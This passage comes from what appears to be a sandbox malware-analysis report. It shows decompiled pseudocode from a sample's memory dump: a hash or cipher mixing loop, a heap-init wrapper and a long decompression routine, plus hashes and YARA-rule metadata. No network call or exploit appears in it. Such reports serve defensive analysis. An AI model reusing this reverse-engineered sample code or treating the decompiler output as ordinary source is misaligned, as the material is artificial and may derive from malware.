					_t289 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0x4036cc) & 0x000000ff) * 4)) +  *(_t364 + 0x1c) +  *(_t364 + 0x40);
					_t361 = _t289 ^  *(_t364 + 0x44);
					asm("rol ebp, 0x10");
					_t308 =  *(_t364 + 0x48) + _t361;
					_t347 = _t308 ^  *(_t364 + 0x1c);
					asm("ror esi, 0xc");
					_t245 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0x4036cd) & 0x000000ff) * 4)) + _t347 + _t289;
					_t352 = _t361 ^ _t245;
					 *(_t364 + 0x64) = _t245;
					asm("ror ebp, 0x8");
					_t246 = _t308 + _t352;
					_t348 = _t347 ^ _t246;
					 *(_t364 + 0x18) = _t246;
					 *(_t364 + 0x7c) = _t246;
					asm("ror esi, 0x7");
					 *(_t364 + 0x1c) = _t348;
					 *(_t364 + 0x78) = _t348;
					_t292 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0x4036ce) & 0x000000ff) * 4)) +  *(_t364 + 0x4c) +  *(_t364 + 0x50);
					_t349 =  *((intOrPtr*)(_t364 + 0x14));
					_t331 = _t292 ^  *(_t364 + 0x54);
					asm("rol edi, 0x10");
					_t310 =  *(_t364 + 0x58) + _t331;
					asm("ror eax, 0xc");
					 *(_t364 + 0x10) = _t310 ^  *(_t364 + 0x50);
					_t335 = _t349 + 0x10;
					 *((intOrPtr*)(_t364 + 0x14)) = _t335;
					_t253 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t349 + 0x4036cf) & 0x000000ff) * 4)) +  *(_t364 + 0x10) + _t292;
					_t332 = _t331 ^ _t253;
					 *(_t364 + 0x68) = _t253;
					asm("ror edi, 0x8");
					 *(_t364 + 0x20) = _t332;
					 *(_t364 + 0x94) = _t332;
					_t254 = _t310 + _t332;
					_t272 =  *(_t364 + 0x10) ^ _t254;
					 *(_t364 + 0x24) = _t254;
					asm("ror ecx, 0x7");
					 *(_t364 + 0x80) = _t254;
					 *(_t364 + 0x10) = _t272;
					 *(_t364 + 0x6c) = _t272;
				} while (_t335 <= 0x90);
				_t350 =  *((intOrPtr*)(_t364 + 0xe0));
				_t311 = 0;
				 *(_t364 + 0x8c) = _t258;
				 *(_t364 + 0x90) = _t352;
				do {
					_t256 =  *(_t364 + _t311 + 0x7c) ^  *(_t364 + _t311 + 0x5c);
					 *(_t311 +  *((intOrPtr*)(_t350 + 0xf4))) =  *(_t311 +  *((intOrPtr*)(_t350 + 0xf4))) ^ _t256;
					_t311 = _t311 + 4;
				} while (_t311 < 0x20);
				return _t256;
			}














































































                0x003d4104
                0x003d410e
                0x003d412a
                0x003d4136
                0x003d413c
                0x003d413d
                0x003d413d
                0x003d4149
                0x003d414c
                0x003d414c
                0x003d415e
                0x003d4162
                0x003d4166
                0x003d4168
                0x003d4170
                0x003d4178
                0x003d4180
                0x003d4188
                0x003d4190
                0x003d4198
                0x003d41a0
                0x003d41a4
                0x003d41a8
                0x003d41ac
                0x003d41ac
                0x003d41bc
                0x003d41c0
                0x003d41c6
                0x003d41c8
                0x003d41cc
                0x003d41cf
                0x003d41d3
                0x003d41de
                0x003d41ea
                0x003d41ec
                0x003d41f0
                0x003d41f2
                0x003d41f5
                0x003d41f9
                0x003d41fb
                0x003d4201
                0x003d4204
                0x003d421e
                0x003d422b
                0x003d422d
                0x003d4231
                0x003d4234
                0x003d423f
                0x003d4243
                0x003d4248
                0x003d424a
                0x003d424e
                0x003d4250
                0x003d4253
                0x003d4257
                0x003d4259
                0x003d4263
                0x003d4266
                0x003d4281
                0x003d4287
                0x003d4292
                0x003d4295
                0x003d4297
                0x003d4299
                0x003d429e
                0x003d42a0
                0x003d42a4
                0x003d42a6
                0x003d42a9
                0x003d42ad
                0x003d42b4
                0x003d42b8
                0x003d42bb
                0x003d42d1
                0x003d42de
                0x003d42e6
                0x003d42f0
                0x003d42f4
                0x003d42f8
                0x003d42fd
                0x003d4301
                0x003d4305
                0x003d4307
                0x003d430a
                0x003d4311
                0x003d4314
                0x003d432e
                0x003d432e
                0x003d4334
                0x003d4336
                0x003d433a
                0x003d4344
                0x003d4349
                0x003d4354
                0x003d4359
                0x003d435b
                0x003d435f
                0x003d4361
                0x003d4364
                0x003d4368
                0x003d436f
                0x003d4371
                0x003d4373
                0x003d4377
                0x003d4385
                0x003d4388
                0x003d438c
                0x003d439b
                0x003d43a8
                0x003d43ac
                0x003d43b6
                0x003d43bb
                0x003d43bf
                0x003d43c4
                0x003d43c6
                0x003d43c8
                0x003d43cc
                0x003d43cf
                0x003d43d2
                0x003d43d4
                0x003d43d8
                0x003d43e6
                0x003d43e9
                0x003d43ed
                0x003d43fc
                0x003d4402
                0x003d4411
                0x003d4414
                0x003d441f
                0x003d4423
                0x003d4428
                0x003d442a
                0x003d442c
                0x003d4430
                0x003d4433
                0x003d443a
                0x003d443c
                0x003d4440
                0x003d444b
                0x003d444e
                0x003d4452
                0x003d4461
                0x003d4465
                0x003d446b
                0x003d446f
                0x003d4472
                0x003d447a
                0x003d447d
                0x003d4488
                0x003d448b
                0x003d449a
                0x003d44a0
                0x003d44a2
                0x003d44a6
                0x003d44a9
                0x003d44ad
                0x003d44b4
                0x003d44b7
                0x003d44b9
                0x003d44bd
                0x003d44c0
                0x003d44c7
                0x003d44cb
                0x003d44cf
                0x003d44db
                0x003d44e2
                0x003d44e4
                0x003d44eb
                0x003d44f2
                0x003d44fc
                0x003d4500
                0x003d4503
                0x003d4506
                0x003d4515

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID: gj
                • API String ID: 0-4203073231
                • Opcode ID: e72a2651f19d07703c7d7f38edc6707504da41a9900ca1f7544a0d3306fcc064
                • Instruction ID: fc072107fd01c9f00fd597482ba70c20de6e413f73cd47a05abe6492087cd53c
                • Opcode Fuzzy Hash: e72a2651f19d07703c7d7f38edc6707504da41a9900ca1f7544a0d3306fcc064
                • Instruction Fuzzy Hash: B9C14772A183418FC354CF29D88065AFBE1BFC8708F19892EE998E7311D734E955CB96
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003FC030() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x4326e4 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                0x003fc030
                0x003fc038
                0x003fc040

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: HeapProcess
                • String ID:
                • API String ID: 54951025-0
                • Opcode ID: 0bfd2ca6599221a0d7e9cd6960bc924a7bbbfb483dcb65b72c0dccd1466de071
                • Instruction ID: 0557bd4c3c2cde542559e63147d81adb75796a2cbcf8ebd2fe05edddac3d023d
                • Opcode Fuzzy Hash: 0bfd2ca6599221a0d7e9cd6960bc924a7bbbfb483dcb65b72c0dccd1466de071
                • Instruction Fuzzy Hash: 32A02230202200CFC380CF30AF0E30C3FECAE0A2C2308003BA008C8030EB3080A0AB08
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E62CA Relevance: .8, Instructions: 829COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 96%
                			E003E62CA(intOrPtr __esi) {
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				void* _t359;
				signed int _t361;
				intOrPtr _t363;
				signed int _t372;
				char _t381;
				void* _t385;
				signed int _t386;
				signed int _t387;
				intOrPtr _t389;
				signed int _t399;
				char _t408;
				unsigned int _t409;
				void* _t417;
				signed int _t418;
				signed int _t419;
				intOrPtr _t421;
				signed int _t424;
				char _t433;
				signed int _t436;
				signed int _t438;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t447;
				signed int _t448;
				signed short _t449;
				signed int _t450;
				signed int _t454;
				unsigned int _t459;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t468;
				signed int _t469;
				signed short _t470;
				unsigned int _t475;
				signed int _t480;
				unsigned int _t482;
				signed int _t496;
				signed int _t499;
				signed int _t501;
				signed int _t504;
				signed int _t506;
				signed int _t508;
				signed int _t510;
				intOrPtr* _t512;
				intOrPtr* _t513;
				signed int _t514;
				intOrPtr* _t515;
				signed int _t516;
				signed int _t522;
				signed int _t524;
				signed int* _t525;
				intOrPtr _t526;
				void* _t529;
				signed int _t532;
				signed int* _t535;
				unsigned int _t538;
				signed int _t539;
				void* _t540;
				signed int _t543;
				signed int _t545;
				signed int _t548;
				signed int _t551;
				signed int _t554;
				void* _t556;
				signed int _t559;
				signed int _t560;
				intOrPtr* _t562;
				void* _t563;
				signed int _t565;
				signed int _t568;
				unsigned int _t575;
				signed int _t576;
				void* _t577;
				signed int _t580;
				void* _t583;
				signed int _t586;
				signed int _t589;
				signed int _t591;
				void* _t593;
				signed int _t596;
				intOrPtr* _t598;
				void* _t599;
				signed int _t602;
				void* _t605;
				signed int _t609;
				signed int _t610;
				intOrPtr* _t612;
				void* _t613;
				void* _t616;
				signed int _t619;
				intOrPtr* _t625;
				void* _t626;
				unsigned int _t633;
				signed int _t636;
				signed int _t637;
				unsigned int _t639;
				signed int _t642;
				void* _t645;
				signed int _t646;
				void* _t649;
				signed int _t650;
				signed int _t651;
				void* _t654;
				unsigned int _t656;
				unsigned int _t660;
				signed int _t663;
				signed int _t665;
				unsigned int _t666;
				signed int _t668;
				signed int _t669;
				signed int _t670;
				signed int _t671;
				signed short _t672;
				signed int _t673;
				signed int _t674;
				unsigned int _t678;
				signed int _t680;
				intOrPtr _t684;
				signed int _t686;
				signed int _t687;
				signed int _t688;
				signed int* _t689;
				char* _t692;
				char* _t693;
				signed int _t696;
				void* _t697;
				void* _t700;

				L0:
				while(1) {
					L0:
					_t684 = __esi;
					_t525 = __esi + 0x7c;
					while(1) {
						L1:
						 *_t525 =  *_t525 &  *(_t684 + 0xe6dc);
						if( *_t689 <  *((intOrPtr*)(_t684 + 0x88))) {
							goto L11;
						} else {
							_t513 = _t684 + 0x8c;
							goto L3;
						}
						while(1) {
							L3:
							_t700 =  *_t689 -  *((intOrPtr*)(_t684 + 0x94)) - 1 +  *_t513;
							if(_t700 <= 0 && (_t700 != 0 ||  *((intOrPtr*)(_t684 + 8)) <  *((intOrPtr*)(_t684 + 0x90)))) {
								break;
							}
							L6:
							if( *((char*)(_t684 + 0x9c)) != 0) {
								L97:
								_t360 = E003E5202(_t684);
								L98:
								return _t360;
							}
							L7:
							_push(_t513);
							_push(_t689);
							_t360 = E003E3E0B(_t684);
							if(_t360 == 0) {
								goto L98;
							}
							L8:
							_push(_t684 + 0xa0);
							_push(_t513);
							_push(_t689);
							_t360 = E003E43BF(_t684);
							if(_t360 != 0) {
								continue;
							} else {
								goto L98;
							}
						}
						L10:
						_t496 = E003E4E52(_t684);
						__eflags = _t496;
						if(_t496 == 0) {
							goto L97;
						}
						L11:
						_t526 =  *((intOrPtr*)(_t684 + 0x4b3c));
						__eflags = (_t526 -  *(_t684 + 0x7c) &  *(_t684 + 0xe6dc)) - 0x1004;
						if((_t526 -  *(_t684 + 0x7c) &  *(_t684 + 0xe6dc)) >= 0x1004) {
							L17:
							_t344 = E003DA89D(_t689);
							_t345 =  *(_t684 + 0x124);
							_t633 = _t344 & 0x0000fffe;
							__eflags = _t633 -  *((intOrPtr*)(_t684 + 0xa4 + _t345 * 4));
							if(_t633 >=  *((intOrPtr*)(_t684 + 0xa4 + _t345 * 4))) {
								L19:
								_t671 = 0xf;
								_t346 = _t345 + 1;
								__eflags = _t346 - _t671;
								if(_t346 >= _t671) {
									L25:
									_t499 = _t689[1] + _t671;
									_t348 = _t499 >> 3;
									 *_t689 =  *_t689 + _t348;
									 *(_t697 + 0x10) =  *_t689;
									_t689[1] = _t499 & 0x00000007;
									_t529 = 0x10;
									_t532 =  *((intOrPtr*)(_t684 + 0xe4 + _t671 * 4)) + (_t633 -  *((intOrPtr*)(_t684 + 0xa0 + _t671 * 4)) >> _t529 - _t671);
									__eflags = _t532 -  *((intOrPtr*)(_t684 + 0xa0));
									asm("sbb eax, eax");
									_t349 = _t348 & _t532;
									__eflags = _t349;
									_t672 =  *(_t684 + 0xd28 + _t349 * 2) & 0x0000ffff;
									_t350 =  *(_t697 + 0x10);
									goto L26;
								} else {
									_t625 = _t684 + (_t346 + 0x29) * 4;
									while(1) {
										L21:
										__eflags = _t633 -  *_t625;
										if(_t633 <  *_t625) {
											_t671 = _t346;
											goto L25;
										}
										L22:
										_t346 = _t346 + 1;
										_t625 = _t625 + 4;
										__eflags = _t346 - 0xf;
										if(_t346 < 0xf) {
											continue;
										} else {
											goto L25;
										}
									}
									goto L25;
								}
							} else {
								_t626 = 0x10;
								_t670 = _t633 >> _t626 - _t345;
								_t508 = ( *(_t670 + _t684 + 0x128) & 0x000000ff) + _t689[1];
								 *_t689 =  *_t689 + (_t508 >> 3);
								_t504 = _t508 & 0x00000007;
								_t350 =  *_t689;
								_t689[1] = _t504;
								_t672 =  *(_t684 + 0x528 + _t670 * 2) & 0x0000ffff;
								 *(_t697 + 0x10) = _t350;
								L26:
								_t636 = _t672 & 0x0000ffff;
								__eflags = _t636 - 0x100;
								if(_t636 >= 0x100) {
									L30:
									__eflags = _t636 - 0x106;
									if(_t636 < 0x106) {
										L94:
										__eflags = _t636 - 0x100;
										if(_t636 != 0x100) {
											L100:
											__eflags = _t636 - 0x101;
											if(_t636 != 0x101) {
												L125:
												_t637 = _t636 + 0xfffffefe;
												__eflags = _t637;
												_t535 = _t684 + (_t637 + 0x18) * 4;
												_t501 =  *_t535;
												 *(_t697 + 0x18) = _t501;
												if(_t637 == 0) {
													L127:
													 *(_t684 + 0x60) = _t501;
													_t351 = E003DA89D(_t689);
													_t352 =  *(_t684 + 0x2de8);
													_t639 = _t351 & 0x0000fffe;
													__eflags = _t639 -  *((intOrPtr*)(_t684 + 0x2d68 + _t352 * 4));
													if(_t639 >=  *((intOrPtr*)(_t684 + 0x2d68 + _t352 * 4))) {
														L129:
														_t673 = 0xf;
														_t353 = _t352 + 1;
														__eflags = _t353 - _t673;
														if(_t353 >= _t673) {
															L135:
															_t538 = _t689[1] + _t673;
															_t539 = _t538 & 0x00000007;
															_t689[1] = _t539;
															_t355 = _t538 >> 3;
															 *_t689 =  *_t689 + _t355;
															 *(_t697 + 0x20) = _t539;
															_t540 = 0x10;
															_t543 =  *((intOrPtr*)(_t684 + 0x2da8 + _t673 * 4)) + (_t639 -  *((intOrPtr*)(_t684 + 0x2d64 + _t673 * 4)) >> _t540 - _t673);
															__eflags = _t543 -  *((intOrPtr*)(_t684 + 0x2d64));
															asm("sbb eax, eax");
															_t356 = _t355 & _t543;
															__eflags = _t356;
															_t357 =  *(_t684 + 0x39ec + _t356 * 2) & 0x0000ffff;
															L136:
															_t674 = _t357 & 0x0000ffff;
															__eflags = _t674 - 8;
															if(_t674 >= 8) {
																_t504 = (_t674 >> 2) - 1;
																_t678 = ((_t674 & 0x00000003 | 0x00000004) << _t504) + 2;
																__eflags = _t504;
																if(_t504 != 0) {
																	_t409 = E003DA89D(_t689);
																	_t556 = 0x10;
																	_t678 = _t678 + (_t409 >> _t556 - _t504);
																	_t559 =  *(_t697 + 0x20) + _t504;
																	 *_t689 =  *_t689 + (_t559 >> 3);
																	_t560 = _t559 & 0x00000007;
																	__eflags = _t560;
																	_t689[1] = _t560;
																}
															} else {
																_t678 = _t674 + 2;
															}
															__eflags =  *((char*)(_t684 + 0x4c44));
															_t545 =  *(_t697 + 0x18);
															 *(_t684 + 0x74) = _t678;
															if( *((char*)(_t684 + 0x4c44)) == 0) {
																L142:
																_t642 =  *(_t684 + 0x7c);
																_t506 = _t642 - _t545;
																_t359 =  *((intOrPtr*)(_t684 + 0xe6d8)) + 0xffffeffc;
																__eflags = _t506 - _t359;
																if(_t506 >= _t359) {
																	goto L152;
																}
																L143:
																__eflags = _t642 - _t359;
																if(_t642 >= _t359) {
																	goto L152;
																}
																L144:
																_t363 =  *((intOrPtr*)(_t684 + 0x4b40));
																_t512 = _t506 + _t363;
																_t692 = _t642 + _t363;
																_t645 = 8;
																 *(_t684 + 0x7c) = _t642 + _t678;
																__eflags = _t678 - _t645;
																if(_t678 < _t645) {
																	L114:
																	_t525 = _t684 + 0x7c;
																	__eflags = _t678;
																	if(_t678 == 0) {
																		L89:
																		_t689 = _t684 + 4;
																		continue;
																	}
																	L115:
																	_t525 = _t684 + 0x7c;
																	 *_t692 =  *_t512;
																	__eflags = _t678 - 1;
																	if(_t678 <= 1) {
																		goto L89;
																	}
																	L116:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 1)) =  *((intOrPtr*)(_t512 + 1));
																	__eflags = _t678 - 2;
																	if(_t678 <= 2) {
																		goto L89;
																	}
																	L117:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 2)) =  *((intOrPtr*)(_t512 + 2));
																	__eflags = _t678 - 3;
																	if(_t678 <= 3) {
																		goto L89;
																	}
																	L118:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 3)) =  *((intOrPtr*)(_t512 + 3));
																	__eflags = _t678 - 4;
																	if(_t678 <= 4) {
																		goto L89;
																	}
																	L119:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 4)) =  *((intOrPtr*)(_t512 + 4));
																	__eflags = _t678 - 5;
																	if(_t678 <= 5) {
																		goto L89;
																	}
																	L120:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 5)) =  *((intOrPtr*)(_t512 + 5));
																	__eflags = _t678 - 6;
																	if(_t678 <= 6) {
																		goto L89;
																	}
																	L121:
																	_t360 =  *((intOrPtr*)(_t512 + 6));
																	 *((char*)(_t692 + 6)) =  *((intOrPtr*)(_t512 + 6));
																	goto L155;
																}
																L145:
																__eflags = _t545 - _t678;
																if(_t545 >= _t678) {
																	L149:
																	_t372 = _t678 >> 3;
																	__eflags = _t372;
																	 *(_t697 + 0x20) = _t372;
																	_t686 = _t372;
																	do {
																		L150:
																		E003F0320(_t692, _t512, _t645);
																		_t697 = _t697 + 0xc;
																		_t645 = 8;
																		_t512 = _t512 + _t645;
																		_t692 = _t692 + _t645;
																		_t678 = _t678 - _t645;
																		_t686 = _t686 - 1;
																		__eflags = _t686;
																	} while (_t686 != 0);
																	L113:
																	_t684 =  *((intOrPtr*)(_t697 + 0x1c));
																	goto L114;
																}
																L146:
																_t548 = _t678 >> 3;
																__eflags = _t548;
																do {
																	L147:
																	_t678 = _t678 - _t645;
																	 *_t692 =  *_t512;
																	 *((char*)(_t692 + 1)) =  *((intOrPtr*)(_t512 + 1));
																	 *((char*)(_t692 + 2)) =  *((intOrPtr*)(_t512 + 2));
																	 *((char*)(_t692 + 3)) =  *((intOrPtr*)(_t512 + 3));
																	 *((char*)(_t692 + 4)) =  *((intOrPtr*)(_t512 + 4));
																	 *((char*)(_t692 + 5)) =  *((intOrPtr*)(_t512 + 5));
																	 *((char*)(_t692 + 6)) =  *((intOrPtr*)(_t512 + 6));
																	_t381 =  *((intOrPtr*)(_t512 + 7));
																	_t512 = _t512 + _t645;
																	 *((char*)(_t692 + 7)) = _t381;
																	_t692 = _t692 + _t645;
																	_t548 = _t548 - 1;
																	__eflags = _t548;
																} while (_t548 != 0);
																goto L114;
															} else {
																L141:
																_push( *(_t684 + 0xe6dc));
																_push(_t684 + 0x7c);
																_push(_t545);
																L70:
																_push(_t678);
																E003E2C30();
																while(1) {
																	L0:
																	_t684 = __esi;
																	_t525 = __esi + 0x7c;
																	do {
																		do {
																			goto L3;
																			L152:
																			_t525 = _t684 + 0x7c;
																			__eflags = _t678;
																		} while (_t678 == 0);
																		_t360 =  *(_t684 + 0xe6dc);
																		do {
																			L154:
																			_t361 = _t360 & _t506;
																			_t506 = _t506 + 1;
																			 *((char*)( *((intOrPtr*)(_t684 + 0x4b40)) + _t642)) =  *((intOrPtr*)(_t361 +  *((intOrPtr*)(_t684 + 0x4b40))));
																			_t360 =  *(_t684 + 0xe6dc);
																			_t642 =  *(_t684 + 0x7c) + 0x00000001 & _t360;
																			 *(_t684 + 0x7c) = _t642;
																			_t678 = _t678 - 1;
																			__eflags = _t678;
																		} while (_t678 != 0);
																		L155:
																		goto L0;
																		do {
																			while(1) {
																				L0:
																				_t684 = __esi;
																				_t525 = __esi + 0x7c;
																				L1:
																				 *_t525 =  *_t525 &  *(_t684 + 0xe6dc);
																				if( *_t689 <  *((intOrPtr*)(_t684 + 0x88))) {
																					goto L11;
																				} else {
																					_t513 = _t684 + 0x8c;
																					goto L3;
																				}
																			}
																			L96:
																			_t438 = E003E253E(_t684, _t697 + 0x28);
																			__eflags = _t438;
																		} while (_t438 != 0);
																		goto L97;
																		L90:
																		_t525 = _t684 + 0x7c;
																		__eflags = _t678;
																	} while (_t678 == 0);
																	_t386 =  *(_t684 + 0xe6dc);
																	_t514 =  *(_t697 + 0x20);
																	do {
																		L92:
																		_t387 = _t386 & _t514;
																		_t514 = _t514 + 1;
																		 *((char*)( *((intOrPtr*)(_t684 + 0x4b40)) + _t646)) =  *((intOrPtr*)(_t387 +  *((intOrPtr*)(_t684 + 0x4b40))));
																		_t386 =  *(_t684 + 0xe6dc);
																		_t646 =  *(_t684 + 0x7c) + 0x00000001 & _t386;
																		 *(_t684 + 0x7c) = _t646;
																		_t678 = _t678 - 1;
																		__eflags = _t678;
																	} while (_t678 != 0);
																	goto L155;
																}
															}
														}
														L130:
														_t562 = _t684 + (_t353 + 0xb5a) * 4;
														while(1) {
															L131:
															__eflags = _t639 -  *_t562;
															if(_t639 <  *_t562) {
																break;
															}
															L132:
															_t353 = _t353 + 1;
															_t562 = _t562 + 4;
															__eflags = _t353 - 0xf;
															if(_t353 < 0xf) {
																continue;
															}
															L133:
															goto L135;
														}
														L134:
														_t673 = _t353;
														goto L135;
													}
													L128:
													_t563 = 0x10;
													_t650 = _t639 >> _t563 - _t352;
													_t524 = ( *(_t650 + _t684 + 0x2dec) & 0x000000ff) + _t689[1];
													 *_t689 =  *_t689 + (_t524 >> 3);
													_t504 = _t524 & 0x00000007;
													_t689[1] = _t504;
													_t357 =  *(_t684 + 0x31ec + _t650 * 2) & 0x0000ffff;
													 *(_t697 + 0x20) = _t504;
													goto L136;
												} else {
													goto L126;
												}
												do {
													L126:
													 *_t535 =  *(_t535 - 4);
													_t535 = _t535 - 4;
													_t637 = _t637 - 1;
													__eflags = _t637;
												} while (_t637 != 0);
												goto L127;
											}
											L101:
											_t678 =  *(_t684 + 0x74);
											__eflags = _t678;
											if(_t678 == 0) {
												while(1) {
													L0:
													_t684 = __esi;
													_t525 = __esi + 0x7c;
													goto L1;
												}
											}
											L102:
											__eflags =  *((char*)(_t684 + 0x4c44));
											if( *((char*)(_t684 + 0x4c44)) == 0) {
												L104:
												_t651 =  *(_t684 + 0x7c);
												_t565 =  *(_t684 + 0x60);
												_t417 =  *((intOrPtr*)(_t684 + 0xe6d8)) + 0xffffeffc;
												_t510 = _t651 - _t565;
												__eflags = _t510 - _t417;
												if(_t510 >= _t417) {
													L122:
													_t418 =  *(_t684 + 0xe6dc);
													do {
														L123:
														_t419 = _t418 & _t510;
														_t510 = _t510 + 1;
														 *((char*)( *((intOrPtr*)(_t684 + 0x4b40)) + _t651)) =  *((intOrPtr*)(_t419 +  *((intOrPtr*)(_t684 + 0x4b40))));
														_t418 =  *(_t684 + 0xe6dc);
														_t651 =  *(_t684 + 0x7c) + 0x00000001 & _t418;
														 *(_t684 + 0x7c) = _t651;
														_t678 = _t678 - 1;
														__eflags = _t678;
													} while (_t678 != 0);
													goto L155;
												}
												L105:
												__eflags = _t651 - _t417;
												if(_t651 >= _t417) {
													goto L122;
												}
												L106:
												_t421 =  *((intOrPtr*)(_t684 + 0x4b40));
												_t512 = _t510 + _t421;
												_t692 = _t651 + _t421;
												_t654 = 8;
												 *(_t684 + 0x7c) = _t651 + _t678;
												__eflags = _t678 - _t654;
												if(_t678 < _t654) {
													goto L114;
												}
												L107:
												__eflags = _t565 - _t678;
												if(_t565 >= _t678) {
													L111:
													_t424 = _t678 >> 3;
													__eflags = _t424;
													 *(_t697 + 0x20) = _t424;
													_t688 = _t424;
													do {
														L112:
														E003F0320(_t692, _t512, _t654);
														_t697 = _t697 + 0xc;
														_t654 = 8;
														_t512 = _t512 + _t654;
														_t692 = _t692 + _t654;
														_t678 = _t678 - _t654;
														_t688 = _t688 - 1;
														__eflags = _t688;
													} while (_t688 != 0);
													goto L113;
												}
												L108:
												_t568 = _t678 >> 3;
												__eflags = _t568;
												do {
													L109:
													_t678 = _t678 - _t654;
													 *_t692 =  *_t512;
													 *((char*)(_t692 + 1)) =  *((intOrPtr*)(_t512 + 1));
													 *((char*)(_t692 + 2)) =  *((intOrPtr*)(_t512 + 2));
													 *((char*)(_t692 + 3)) =  *((intOrPtr*)(_t512 + 3));
													 *((char*)(_t692 + 4)) =  *((intOrPtr*)(_t512 + 4));
													 *((char*)(_t692 + 5)) =  *((intOrPtr*)(_t512 + 5));
													 *((char*)(_t692 + 6)) =  *((intOrPtr*)(_t512 + 6));
													_t433 =  *((intOrPtr*)(_t512 + 7));
													_t512 = _t512 + _t654;
													 *((char*)(_t692 + 7)) = _t433;
													_t692 = _t692 + _t654;
													_t568 = _t568 - 1;
													__eflags = _t568;
												} while (_t568 != 0);
												goto L114;
											}
											L103:
											_push( *(_t684 + 0xe6dc));
											_push(_t684 + 0x7c);
											_push( *(_t684 + 0x60));
											goto L70;
										}
										L95:
										_push(_t697 + 0x28);
										_t436 = E003E3F9D(_t684, _t689);
										__eflags = _t436;
										if(_t436 == 0) {
											goto L97;
										}
										goto L96;
									}
									L31:
									_t680 = _t636 - 0x106;
									__eflags = _t680 - 8;
									if(_t680 >= 8) {
										_t441 = (_t680 >> 2) - 1;
										 *(_t697 + 0x20) = _t441;
										_t678 = ((_t680 & 0x00000003 | 0x00000004) << _t441) + 2;
										__eflags = _t441;
										if(_t441 != 0) {
											_t482 = E003DA89D(_t689);
											_t522 = _t504 +  *(_t697 + 0x20);
											_t616 = 0x10;
											_t678 = _t678 + (_t482 >> _t616 -  *(_t697 + 0x20));
											_t619 =  *(_t697 + 0x10) + (_t522 >> 3);
											_t504 = _t522 & 0x00000007;
											__eflags = _t504;
											 *(_t697 + 0x10) = _t619;
											 *_t689 = _t619;
											_t689[1] = _t504;
										}
									} else {
										 *(_t697 + 0x10) = _t350;
										_t678 = _t680 + 2;
									}
									_t442 = E003DA89D(_t689);
									_t443 =  *(_t684 + 0x1010);
									_t656 = _t442 & 0x0000fffe;
									__eflags = _t656 -  *((intOrPtr*)(_t684 + 0xf90 + _t443 * 4));
									if(_t656 >=  *((intOrPtr*)(_t684 + 0xf90 + _t443 * 4))) {
										L37:
										_t516 = 0xf;
										_t444 = _t443 + 1;
										__eflags = _t444 - _t516;
										if(_t444 >= _t516) {
											L43:
											_t575 = _t689[1] + _t516;
											_t576 = _t575 & 0x00000007;
											_t689[1] = _t576;
											 *_t689 =  *_t689 + (_t575 >> 3);
											_t447 =  *_t689;
											 *(_t697 + 0x10) = _t576;
											_t577 = 0x10;
											 *(_t697 + 0x14) = _t447;
											_t580 =  *((intOrPtr*)(_t684 + 0xfd0 + _t516 * 4)) + (_t656 -  *((intOrPtr*)(_t684 + 0xf8c + _t516 * 4)) >> _t577 - _t516);
											__eflags = _t580 -  *((intOrPtr*)(_t684 + 0xf8c));
											asm("sbb eax, eax");
											_t448 = _t447 & _t580;
											__eflags = _t448;
											_t449 =  *(_t684 + 0x1c14 + _t448 * 2) & 0x0000ffff;
											goto L44;
										}
										L38:
										_t612 = _t684 + (_t444 + 0x3e4) * 4;
										while(1) {
											L39:
											__eflags = _t656 -  *_t612;
											if(_t656 <  *_t612) {
												break;
											}
											L40:
											_t444 = _t444 + 1;
											_t612 = _t612 + 4;
											__eflags = _t444 - 0xf;
											if(_t444 < 0xf) {
												continue;
											}
											L41:
											goto L43;
										}
										L42:
